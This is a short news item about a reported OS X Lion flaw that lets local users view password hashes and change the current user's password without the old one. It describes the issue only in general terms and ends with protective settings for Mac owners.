A new post over a security blog Defense in Depth reveals a serious new security flaw found within OS X Lion that could enable anyone with access to your machine to view and change your administrator password.
According to the report, even non-root users in Lion have the ability to view password hash data, and could then use a very simple Python script to reveal that user’s password.
Unfortunately, the situation only gets worse, as Lion doesn’t require a password in order to change the password of the current users, meaning that typing a simple Terminal command would allow you to change a user’s administrative password to something else. The security exploit can only be used if a user has direct access to your Mac, and has Directory Service access.
Disabling automatic log-in, enabling sleep and screensaver passwords, and disabling guest accounts are all recommended to help prevent this tyope of security compromise. Hat-tip to BGR for sharing this report.